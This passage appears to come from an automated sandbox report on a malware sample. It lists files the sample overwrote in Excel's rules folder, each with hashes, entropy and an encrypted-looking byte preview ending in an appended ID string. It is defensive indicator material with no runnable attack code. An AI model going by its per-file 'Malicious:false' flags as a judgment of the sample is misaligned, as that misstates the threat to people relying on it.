                                                                                                                          Preview:<?xml.q..].7.?.b.....1.C..F.h.Bo.D......E...U...SAa.3y6.x.Pq3.N.sW.0..ZC.*<.Qy....<...}.8..Zj..H...3.X...PB-....*ruY....p.X'...W.g....u...I$?.../\3+...^...>..n|.y.'r.=.u......g..V.`..._j...u.D.$..75E.4....D.8...-....\..&P..Pu.~7.\m.$L]P...9.=.......f#.....=.......G#aZ..-..n..j`.6...{8s.z....$...^.2...;..p....(.(....F....=Y.R.`.'F...E.g.82.f.......O..!L.Z."....|..t"%N...|v.....4.R...x...h....j.V..<...k..VX.....z):G/a.tJ..[t....n...N#.w.u.......v.h-....u.i.........2<r.....}....y .Q.za".^.L.....&.F....y.`...p.@c[..... t.U.......8...r~........q....N...Q..`..Y.....$..u...G..?...'E7J...ZJ^4.=...g.z.uc."...X:Z....xaE2.m.H(..a...0..7xl..O.y.h..~...{Uy.}".S?..;..V..u...m./....h.....*4.c...Wi^T.*GB[.i+X.f.<..(..H..Hqj....{..........i.B.|...~v.Fx.-..........(..C.-...3.n..G.8W"s=..:.......P.,L.Y...c.._...m. ......,*^..krK.)..o.'.,!)..B.Ar...|/.{..O...Y/:.S.....O......JZ...N...Wm.QL.....2.j~..:...P.3.&36A...%.-BN.[E.To....c.uE.&g7rH../.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100128v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):752
                                                                                                                          Entropy (8bit):7.7058545000470176
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:0pNM3u+DoF3nAxCWpav1lK5mWcNR28EXdGM96wYTob5RNSsTSldB1Lif7EJIefof:0puTDPxrO24WcNR284cu68oB1LhIrvbD
                                                                                                                          MD5:7A07078ABE04C478225ACFCD4B477385
                                                                                                                          SHA1:3DAE06931834AA96863DC7786F347126C578E0D2
                                                                                                                          SHA-256:3174C41F269A90140DCB5DFEF9CDCDB809EB23EB704E7F57CF248AAEAE4B43E8
                                                                                                                          SHA-512:657BFDB24911AFDB61A7A16B73BE81AFC7C25B6F14831E767EFAB70FEA64051DA4370A0ED09B095D761EDF639113CC0B0C558A8E4D5553DBA4C6719BB37BF306
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...,u.p..9@....={cP1..$.^..Sp..mj..?t2..d~r.*#...v.O...;..g...iM(.io..HU..l`...f..)<.V...Y.,_3%.X..:..X...d.z...-....P...pq..r.D..?..g(.l8.A.CN..?. ..T.H...a...#b...;.......P..f..`.2.s..^.xp..c..T........P..G.5.....}....'....Q.'..."..}......p.Tt]h.r.r."..}^5V.0.Pe......X.u.{.!3..87N5.... .z..{.GV..7.2xS`W......$^...........{\..j..W....D.a.k.u..(..=..N.hP.5.......j...c/yZw....?...{i.F@...aM.......K.i-..........9../.t..o+..O.,.....b.n..O..m.....zrH.OE....... ........v).....H.e.l.fq...r..7..,.H..{<.=<7...=*$j.[Ko.=.8.Jp..6....xp... ..."..x...6...".4.]X..........r.[...'.jU7.........V..D. /.`b@.....7..~..%w.. ..+..REd....=.....t.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100129v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):752
                                                                                                                          Entropy (8bit):7.695153994433493
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:LgHNz2sG7MimOW9AswgtAk5L0rxq/dtN9VYiXtx3xWASNr6XT4eMV2UTJhZr9GjU:EtzLpiPguGL01mdtN9Vt3xbgm4eMV2Un
                                                                                                                          MD5:BD05E7CEABE7D344A5CA8DB5D3348924
                                                                                                                          SHA1:CA38C3838005C7899B69203CA52A0F079EEF8576
                                                                                                                          SHA-256:270B2FEDBC71B4BD1233358C606B70BF99ECC6DE96DA5E2AF9350339E22B420C
                                                                                                                          SHA-512:81B3E0C0248E082494103BE59C55AED26E58E323894B8951DCF82F2671A357EC62AB0AF90ECADFCB244D41C957529532B410467D6760CFA17CEEE58127083F04
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml._...R.r0..p...ZY..n.w.b.....13=b6...Z.......,.#D..q.h.....s<..=.M.Q..kx.@....v..yL......H.lY...o2+.....p"...TO.V1...W.K. y~.M.....tE....Z[.......$.q`.a..50E...T...h.,.....k#..s.%.P"...G......=.)..I...s.?...W.oL.I...tfO.."xe1k.M.....i......7.k..g....xv.tY..PJ.Y.BL.)cZ..3.1k..V;......p:...J.../.I.....i.4.4*../.\..s...l_......;...=.....,..O...h..j...N#........?7 .=\k.W...`.a....@._..&..a....^..A)....?.._...4.....Y..:...:."_....y|d.S.[E..i..*..,.S}s.....9...w=....&}..i.uxW...M...K.L..;....x.0....c...tW..<.4W..Y75..e8G...9...u..=.%S.t.+...F.0......j.....G..28.;.Ev;.b........o.[..s.....R`.0L.3}.B...!............=.j...%.7[.YH.;......phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100130v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):819
                                                                                                                          Entropy (8bit):7.7155004528576
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:qYVfzc2lI3PKFYLTgsJeJp+wgx8Fk8dYlmwWiqc1Y2j3q2Ll5w9W4er5nHwRqpAS:FK0swn+wS81Yl15+99eKYpAgbD
                                                                                                                          MD5:8477D34F261F87E2E2FAEB14F70A63A8
                                                                                                                          SHA1:76D6CE60660CC0EFB5DB25AED67FA8818823FD9E
                                                                                                                          SHA-256:CC6AAB55D9A510C4574270301417272782729984F69CA35A80F81924131C6C68
                                                                                                                          SHA-512:91A068D3B8AE7007CA6D10D048675641389DFD44ECEDFDBB7850BA9B1D747ADEE8B4171C9A39156610FAD64A0B0C4095EC92F35786828246AD9FCBF83598F393
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlox2..^.vw....c..\a.k..{9tu.#..\c....s..~.c`...."......{.......h......(..N.3.F....c.4..v..]^..#.P...3Q./.3....jk.~z*.H.U."b.R_......=.r..S.##.....x~.H.:..[.:...>....eR..9.h.....Yf.i{p....A....3...a.O..]>.N... 3b..b..pK...=.:......`..i.5.........%...V...k.s......U[........u..:..PI.x.hb........q...C.a....)=[d..c.6......A.h.....VP8........].._.[t.^:...lu.3.........0.(PK<=.......e..;-..t.N.\..P=g.c,E..V.,e..].....U...X.....).x.e..D.H.q..#c.=.@......z...A..\R...A..welT*...|...r.......f.;hk..vy.<.i.[v.FF..X~"J...cWG.W./6.K..5.%.lA...(..z..Ck.iI......2....~.......>Y.....as..h|....3.....rT.S...pzv...[......$'(f.&9TD.e...tv..=...hZ.gE1..e.....a.7[l5..P4.h..]Aog[[/.p.q.......$U....N...D..'..P..EK..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100131v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):747
                                                                                                                          Entropy (8bit):7.6745039487204645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:V1Yr5jH5HQcV1HNAZKIUGF7Sgb93OFvjkqNqJ2mmFB21qMZerQQ89wIRXTJsTLqt:vYrV5wyHN2KIUa1kw9QoqMZiQQMw0NzX
                                                                                                                          MD5:319567ACE44D8FA4E45006EA7DBA1846
                                                                                                                          SHA1:146AB8BFC0392AB95F2747CE3BCB68AB4C1F1450
                                                                                                                          SHA-256:1D2B55E92AFE8504DC7267D167AE0A76AD03513A5AEAE74C68F422DDD86BE49B
                                                                                                                          SHA-512:9265A75AB7A4828065428A3E9DB7EB202B2604047ADD0BA76039582447ABA54BC85D3F9E0FF9FAD8E64096558D767781F7740D7182315716B9A1419B439FB7D9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.X.I....b..r.........j.f.}.q..?|.p...L.<$.e..d.........BcD...&bc.-(~X........;d..-...01..~...ph...>......].".Q.f|..g.N.}....Sv4.*B..Vk..^E.q.e...iB.1.....%1v).r...%.O..p.^A..n...z.:C.8t.)!ezD........_...iq..AT..Q~J....$....kw.[t.........@...<..{?.W......6..zq...;.4o..7v.>.7a\Q...."$4.".....f..7m.v=O.<.2....d..E.b..~...:|...Vq.L1>.np-$...L.1...m.Xu...v.~.*.s.......'.?J,.Jyv;..!y.&.?V5"..........!k..O..*bK...~.?N.73.q&'LtIk[.7.xbz.....k..0|..6..$7&....X..Y..c,.e.-.d...Wcua..........D..m...`,L;1..7}..[.'._..s..n.`.l.U..?a.j..._W=.~...(..T....Q...5.......'.......(...x06rQ.%...g.'.Ke........I.......^..~..5.ko..9s|........'0.....~.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100132v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):764
                                                                                                                          Entropy (8bit):7.7243341083724575
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:Wgxt/dOJOWCLu8SxNB5dnSJ/fbbujS/Tq/t18oF5k9HdTXVfCQpP3d4UpgV79YmV:WSt/d+2u8SxNHxW/fbbWCTqFeoY999hS
                                                                                                                          MD5:0D94B072C3898EB79EEFD125A37A96CC
                                                                                                                          SHA1:995D584ECFBA076A5795ADDB7B0D2780FC6C8641
                                                                                                                          SHA-256:1D1677833019993E8653FA0C8CBAE7FF905B24F78CE062EE2D7EB52965D3B2FA
                                                                                                                          SHA-512:C8261831D3A39BEAC6BC8CD8E565CF43C2B8FCB7CF6794854FCA688A76DA53A818E375C4E0B414E0A551E4E7D2635DD466B3B0DEC24E86B5F6880EAF04B1BD9C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml7.:..#>{.M}..oT.n&v....*...{.Bx.!.V!,4.......@.../.........C...p....'=...D.....P*.G.r.r.NLq.5}........{..^.d.C.\}.,.j.;...d...9Hv..u3=}.....o..+.<v..(......z..FT.r{..]}.5.C.B.$.....Dx.....Q...3....f8.W..u6.....O.k.@..n.......2P.k..H:........D...L.!\...H.!./u...+.I.....*....U.V.W...n8.)Q.R;...k.+EI..Q.kM.y..sFu.......k.....c....A.~.~E.....v..0.uz.\Il..8..Bn..o..i2.k.w.ojz~..S.....]hH.f..T7..8O..._~..... ..9&....~Q}.j.i.....a..N/.A:s<.I...h9.g...u..<3P.6.@0..v..BW.w..w..!..\..?.`WN...f.b!|.g*C0$..~...&...k......q..y..n6.?*..Y...@.S.....Q6...e....h....c.....V....W..^^..L.Z.q.Y..t=.._<.6.C...fs....g.0Q.k-......~..K(T...?.../pFL.[.v.V...Bpob..S...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100133v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):751
                                                                                                                          Entropy (8bit):7.68689919494462
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YR0JxnaVGfhKa5MVgKJRd3msUOIWC4rHDqQT8XBnQnoFYZbDz9KjOqa1Yq5bTciD:YRKnaVQhKZbJmsVrrHDqy8coI9KjORbD
                                                                                                                          MD5:2C9C25870B7791F953918D3F33660418
                                                                                                                          SHA1:C9E9B086EEEB8F9BD8AF12C99EAAB81A7B96A536
                                                                                                                          SHA-256:9B3F24C5AA600A4DC3A29513024399E1C23B29270B2889BCF714941885FDD09D
                                                                                                                          SHA-512:5AC0D37EC00748CEEDC70F487CB45DA581600727459C871A0F240D00E0A9569248A5F1DE749090BB03B4F80657F8B8637C4AF71CE31E96BCC326F4807E4DF106
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmle...x.t&.,..,z/=D........A.l..f..z..|..Zu.yp...!.lF......]Hj.C......q..17....._..Zv.Wp.Y*...B..3f..(!&BF...r...WZu....%.^..p.^.(k.|...8......".s."..I....l&.....b<....D.8...j=.6..v..M.uRF 1....`...'.B...'..,e..6c.H.T....2.X........L-.F..6.........V....y.}..\...xV@.5.` ..(.5...S.=.."4..?.sh..0......{(......).....w.../....R..-aW...<...>j........0;..T.wW.~.HePn..B.../...QZ.q......q.x..>..s.]<..K..>i......X7.H..w.?.....mv..z.....f..+A...|.j.,.%6....h.J.5o2[`..1K..T. .`/..q. s4.d.p..(..Zwm....8.U>..e..t.S..W.UM..G.........z...}...Rds.......o....}t..5Lm.6....<N.....Tt.!.6.H1Z.'>.5m]....9.Qg8..;g[..K.Ph1m.>,#7.....q.s.......LT.'.=...?..{S[phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100134v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):752
                                                                                                                          Entropy (8bit):7.757099713036752
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:LF9HMZ33h4anzmJtatS3hXtO4t9o5sLiH+LqDagxIcHcQZ9vT/6eKuowU/V7Vrse:J9G2dXt9o7CcI1QvvT/6uVG7VgMbD
                                                                                                                          MD5:3FA418C3BD3EFAB4383A63D1A3031546
                                                                                                                          SHA1:F92F52972D9F0C46C0F6AC505FFCA1B2020230E8
                                                                                                                          SHA-256:33EB5D4105540541E15ABEB98823BF47B147D979E56BF8101D977AF1888C87AB
                                                                                                                          SHA-512:D057D0466004EC3DE21AEA6322017B065E0F854A66E9E4C2064C69B74B3AFC5092D4BB9391BD965E3DD60C29294BC4F2FBF3FC56703FD4F18C43A703CE9C860E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..r.0Ic.J....ts....V....p'C..".AR....[u.$&..c.|..C..6.#..O.O|.N.....Q..X..@4J..NH.!....'..d....]...(..T.T.]....Q..d.."C.....4[u......9.X$,....2..cXk.......Z...!Z...rU-..C....A...(...a{K....xi.q(E.}/.n.Ujr.9......K.D..u.<.jAx.........~?....g...#.._...;=.z.'}|.n<.@....L\.*..NK"Su.r?.|*..2.c-K\..9..q....~I&......f.h.&on..r.......j.$.V`N.....c..N.........g...,.q-Z.L..<.0PY.....~.K...+..W..3.P.n.....U..BI6.n|d.H....%.8."l0...)...._..AH..Q.....Q.....D#..&......R...l.Q&y.ML.?y.2.2..?].K. .3.\....Z.....T]..j..FB.{..Fmx......#.!....7....$.Y..1..`.b|H1=e.o..QH..-.U..B..5!.w.D.:..z...n`.i.+...P.!...!......X^..n...;5.@...e..4.)`u|...V`....J..u.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100201v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):743
                                                                                                                          Entropy (8bit):7.636338520456738
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:oRBbbZTpVusExYwj1LMVK1rEw5/XBgmvZG6vJrgBsU3xgcMspPq5bTcii9a:oRBHDVteY2LcK1zRXW4jrPbswbD
                                                                                                                          MD5:E8DEA649295122DFE3DD2B2EA3269C86
                                                                                                                          SHA1:0FF5606741071B6C45A63AF60411ADCD4A01082C
                                                                                                                          SHA-256:42126F8430D50D23A2C584FE4A5D7D72CF9F6F0A72D4B17F296036D8EA844992
                                                                                                                          SHA-512:4EEB22E80E488959CEBABEE3C94D922851C9F22F74AB978339B4E5C90BEFD43B2FAB2C9B0D3D1DC9A524FAA97534C6F4BCC74A67E77AAFA6FC5464413A5E2F1D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.BR-?.&gP."l....?..Wn.>....n....'.....9....m]R.~g..9.y..)S.......{......B.......w.....E..R.d..T...A.}.N...?.J..X{,..cm.4.g.[....N...X.&...O?..x`....`.v).....2.9vp. (..X.IO;...aR$K]MB?.W._H.8. ...0..x;.n1....l..;M.C...]W..,.k%....~8...HSN..p.$li"..l..2..)e....yj..g....w...FuY.....:..J........;..e..5...pc-.N..O..^...h.Fk`Rf4.Z..=.....#.!......I.gt.grn...;......(...&6....l..~...b...........q.;;..5/.>C.G#X..Ye=.W..X.Z.J?#.s...!>..k.T.*..n...q.~^..(J._..a.q.....Ez..Y......7.mE'..N?$.]..Th/...e....rr......-...D.x.l.aAB...T.U..}(;VNgM.`.5,.v....X......|j.nn9.4H..N.?.$.x...v..s.a..8X#C.{7.....mM....n.x=.1d.0..I.uX..-..'S!,G...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100202v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):929
                                                                                                                          Entropy (8bit):7.77683917958659
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:q55y+53Blo8EVPz4AhzSmQ8WI2nChiVSv5pNt4TQlBUNjgSRs7h2nimMUvBXuCoU:qugk8Ab4AhzHpZi6BAjEEnimMixbD
                                                                                                                          MD5:D05ABF9A2794F836966519AD05A16507
                                                                                                                          SHA1:CEE3739DCC6FC44C7781A8EA0BF3DE0125DAAFBE
                                                                                                                          SHA-256:0B1963FFC95EACD86BEB47940309CD43B8A4E8A034FD58A7081A2BB98CEE281B
                                                                                                                          SHA-512:DCBE277C6C8050FDF4AD8380B1503929694F16DE89DFFEC978BB76F4097EC58B6938DD1A49845622262ED962D28F9C8F0175AFB3DEBED96E9237789EC58892F0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.Tm..R.Q9...".....{.I...........E...'2.....+...s./..7.$q#..P!.lU).%.6..G.......{....ntU...>.`.1.....V..\.Yc9.QI....i0.X.e..D._......V....y..o"T.....CI..^l.g].. m......b.R...G.f.b..Y.Y.B%....9.:.@+#.Z.}n.{......w.1.nZ..:%.'..... .$...h.Ag.-h...'........#.T.Z]h..C.......hnPf'~.....3....D...n..@.*......x...U/.>.(....5/.".q.....t..#3./........4......8..~.g.ELz...O?....."......9.....$..L...x...mG"..<f....s..RQ~5.#.J|.|F1.H0.{.s..A...|..9........l....z...T.'...#B...G..........N...1..ux2.(.......V_eW.......C.s.{.....:...^E.U.&C=9....0K.O.=.....x,.*>.^...........P6W"GG.q.....$l....7;..R=n*.W...E@..o..\9.......B.E.]m.3....+...,}.Z..)..!.>~.g....8c..I)UFG...5....xm[&.MYdL.VQ.c.......v.((..s.C...R..^.M......mV........:i$~.$t.6@,m..3...4...t.).&..$..a+.A......5...$2+..p...'...E..!..%.^....l.Q$.../..(,.y.QphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10450v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1387
                                                                                                                          Entropy (8bit):7.85056538564138
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ARrsF5/9tkZg1uPrQjAjOpkWFeClC6owmJIA2QBE/DT7/ivFUDilAcXGbD:ARrcPCqsPEjAj1WFJ3WnY/PascED
                                                                                                                          MD5:EF214A53F65037C44DB9AC0B2CA629D7
                                                                                                                          SHA1:779032E787502418FAB7FB48DAA5554D7BFCFC05
                                                                                                                          SHA-256:B02BE49F0A870C0E4C1D3B8F432DC36DCCFFBD667FD6BE260075EE143E0B73F8
                                                                                                                          SHA-512:DFB2E5AB3D82AC3DD073632059D57331670DF907BA3FDE2014E8388AD6484B48CB546B661DB22FC067C2AE5EC094BD848A12924AFD65ADF31B4666C744C47FE1
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..(.O.o.H.....B...&W...1f46YF......p.)N.....i...L.... (...H..Q.%...c.9.w].&......0J.J..|.}t. .xK.G9..b......P.'u.cgt.........q.W^2..f..y..Sa..%m9j":n.@.c.bl..`AM......5.DK.W3.3.....BPr.Z......b.8..cP.i.4.~..V.i........Q'..=../.{./..H..I...;m....S.Y2D..!..B.6.l.....r!..@QF<5.s\.+..t.|:.I.Q.3..<2.q.....-UO.+rl..0.e....i+.p........~./....__.691>.c.{.....s#d....p/..&5..r....<}....AZ~.(7....r.E.$r....H.pb.W....e.h3.I..x..|.pP<.".....st...S....#.A.;......0..N.......9..'.....7..y..C.....C....wk.LC.m..G.%(.....{EW.x....J... @....Y..d.tk?..W.....:V..g.>".4..rM..p..G.|#.L{.....B....\..~&..Q.q..........0.R..._..>Sr.v.../Y:e...e...i.8.Q.M..t.I..)..L...R........j...W.j...A.y...l...Z.F....}p}q.3h[.,......v.:....]....(...1.9./... ...a^.%5<..A^.R.#cRJ.._...QW...e..^.y.x.''.'F.o<.J....bh.....W.93.'...I...x.jA...p.x..I....b*..D...y.F..|.`.jC.....6.6Z.3..X..z.z.h...k.y..%e....*.uxUX....J...~}9......[[....`.:..J.b7U.>...;...@.=...Se..\o..j.....Pv.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10625v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3024
                                                                                                                          Entropy (8bit):7.931351582986415
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:+3p1U9nVC+ClGQAaICuYldqEmANeIUvLOVXL6nKdpkQDK13KAVwPNGzKWUKD:EMVC+g0aXNPqE5NeIELOV+mpkQ2U1Emk
                                                                                                                          MD5:B498E2BD02C10C772895A64529D665FA
                                                                                                                          SHA1:9CBAC3769EDB2FA07F340500EF3EA5ED2F683DD9
                                                                                                                          SHA-256:6FDAE5AB0F72D69AE8208ECD05FFE2742B82348A78CBA23BDB3DA6E586EE9E7B
                                                                                                                          SHA-512:365A4B33ADB9AF704B170DD1A14B070A47A089CF797BCE85386A55093B1D66C71CD6D794CDC8150A30FD907E661EB80DD5F732CDD68DF4E362D918BD09DF04EA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...g.k6.Z.ZS.-n..h.F...uT.....V...........~E....d..h.>).....3......If..L:.R.......;.P.id....B&....a.".1...X.?..6...*.K.p.Gu./2|..L.;KXk....).Z..y`..>.Q.'.j<|.Mm...R......c.&.7`.;.b..%.vk.{.y..E..1+h..7M....o.....J.q..]......*=[B.u..Z...s.......-.I.S..O.j?6<F.?.aNK..xO....~C...U...............nk..%.w...?=p.8.+.N.........z.ai...M.5.h.h^.]..v...Oj...;...\5n...1..?i_....n....-...+..B.........f.z.*.j...%07W.5GG.3..3.q...".^?c.!TY..:...".g.`......=.c...;....[..|..7...(..X.9...`.IT.#....92N..-..D@...!..Y...a|.Ql.H.e...$..;[..^`MS.YL..]..CN..^....Bc.-CC..SPo....z)..q....\C..)DP.>..(.G....]K...@....i. 7L.....Pt....._./.......E.....>kFt.?m.t.D:.K[..ul.g.c.#.]./Ke....{.!.rV......v...x../hh?h.5...y..i#.>g...9.:.5%..dT........P..1...Vr....B.P....r.y............~..y...&....a.}^.......Z..6...h.&..7y.<.4-....|....74..}U..(.YC.0......8N.t...*m........p.9.U4..9*..{.`5.!J.e...si..]wcMT..(..G...m.....O.).i.MA.........0..2`P..X1.,d..(..w./.?D2.a.F....+*..@..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10626v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1675
                                                                                                                          Entropy (8bit):7.870712244252294
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:C4MkIo+9/5LdEbDuJ3vkOCHyy0T9+EvRC8D:CJx+bSJf6OYeB
                                                                                                                          MD5:8E50350D1CE0F19C56E64CB0EF250566
                                                                                                                          SHA1:28D0EBDE309BB03F948383EFEF1BFDB884E2764B
                                                                                                                          SHA-256:7923EE0AC155FA192541CA740527E155320C7154EC48091D08E17987ADC0D46B
                                                                                                                          SHA-512:6D71F8C5BFC08764564790C353D54A64F1301556BB1348869F29A697144C9D1221F8872D6813A83CFAD43235CBF106B1BD110933CA068BDD4F339B8D592D93CA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.W.m.%....u.g.{...Q^i<.;...*....w&.|..D..XJ.6.....D.]#.7.Qt....*bn.....\...hA..;...!t...w.W.S...q8.>.N>J........-...NI..../".._....7....G..},G_<gT.*.Uq.+.....5z.K.PWy.......A.h.....Z3.'..zK.....2....p......]~.=C>&...=I.U= wk......Zo6..O.o..C....B.Q....H.?....W.B.]6P.rRf(....H.H..3.iL?.v......O...D.),.^p.(KQ6..-.d...-.4H.:q....:T..2.....Xy<..i....[...n|W.d.....b..\%(I...0..q.T..@<.==q.....hd:....C....$!...:....m.!..d..y...?l.E....f.......k...@TX_.?"...K...k.>.^=53........Eb..:...z4r...m*..I..A....s/.e.vZu.{.+Oj..m...La...S..x.D."E.......[|...jQ..wa..T.d.OR{aPDG.e`.7[.J..k..O.&.\....k..-.C...f[.!.....e.}#..i...q=.K.O.L.u9.E.|.c..Z....L7.u../5C.....i`..7.T.*:..3._G9. B$..r..;....)y5a..y.......ef.k..Q.BI...0h...6..g$.....!..Hg.WW`.]@.U?~.+-+a^:.h{.+.9$.]Lj+.....!....n.w.Esf...*.i..j.-....0%.S...FE..}..&.(.&..i.........{!\.]_..K.I..q:y....!..!M..P.YL...=....Y.l.k...]......z...7.".q.......O....v.C..OY.g.......6/.Ez9.*.$....8w.....`^......Z...+$...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10627v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2113
                                                                                                                          Entropy (8bit):7.903215334936882
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8hItJB+orECxzgren1qok2LI1Zmqy19oU9HvDyobRzI4uVsO8wFZQFKD:NtP+AECxC21vNLqz4iuuobRk4uVsO1zD
                                                                                                                          MD5:97A69F5157065CE767D851E61370BA1D
                                                                                                                          SHA1:4853B76656D30202A59CA702489D733B47593C90
                                                                                                                          SHA-256:48BCF198F9DED1EB0E1D2F7756D788690C02A7D18FCC528BB50746786F5F8233
                                                                                                                          SHA-512:4823E7E410909A1E4ED0CD48F25B0B0112B2F095C37128AE0777E95216523C620FEEE9530BD1E2FAC7C7903B129E49A8D073CE42010E4B1C2C843A5E12DF54DC
                                                                                                                          Malicious:false
